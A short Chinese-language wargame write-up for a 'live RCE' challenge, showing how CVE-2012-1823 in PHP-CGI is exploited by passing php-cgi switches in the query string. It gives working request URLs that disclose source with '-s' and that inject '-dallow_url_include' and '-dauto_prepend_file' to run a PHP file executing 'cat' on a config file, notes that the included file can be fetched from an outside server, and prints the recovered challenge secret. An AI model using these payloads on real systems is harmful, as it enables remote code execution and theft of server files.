具体漏洞是:CVE-2012-1823(PHP-CGI RCE)
在地址后面加进参数运行对应的php-cgi 参数的行为
例如 index.php?-s
相参于/usr/bin/php53-cgi/php-cgi -f index.php -s
php-cgi --help如下:
Usage: php-cgi [-q] [-h] [-s] [-v] [-i] [-f <file>]
php-cgi <file> [args...]
-a Run interactively
-b <address:port>|<port> Bind Path for external FASTCGI Server mode
-C Do not chdir to the script's directory
-c <path>|<file> Look for php.ini file in this directory
-n No php.ini file will be used
-d foo[=bar] Define INI entry foo with value 'bar'
-e Generate extended information for debugger/profiler
-f <file> Parse <file>. Implies `-q'
-h This help
-i PHP information
-l Syntax check only (lint)
-m Show compiled in modules
-q Quiet-mode. Suppress HTTP Header output.
-s Display colour syntax highlighted source.
-v Version number
-w Display source with stripped comments and whitespace.
-z <file> Load Zend extension <file>.
-T <count> Measure execution time of script repeated <count> times.
http://rce.warchall.net/?-s
看到index.php的源代码
基中有一个语句是:require '../config.php';
然后我们想办法读到这个文件
index.php 的绝对路径是:/home/level/20_live_rce/www/index.php
../config.php 的绝对路径是:/home/level/20_live_rce/config.ph
想办法输出config.php 的源代码。 php-cgi
参数中:d foo[=bar] Define INI entry foo with value 'bar'
-dallow_url_include=On
dauto_prepend_file=/tmp/2.php
在/tmp里建立一个2.php内容是:
<?php
exec("cat /home/level/20_live_rce/config.php",$out);
print_r($out);
?>
提交地址:(地址里,这个/tmp/2 可以换在自己的服务 http://xxx.xxx/1.txt)
http://rce.warchall.net/?-dallow_url_include=On+-dauto_prepend_file=/tmp/2.php+-n
URLencode一下是:
http://rce.warchall.net/?-dallow_url_include%3DOn+-dauto_prepend_file%3D%2ftmp%2f2.php+-n
得到 ../config.php的源代码:
Array ( [0] => define('ICANHAZRCE', 'StrongGard_6_3');
[2] => return ICANHAZRCE;
[3] => ?> )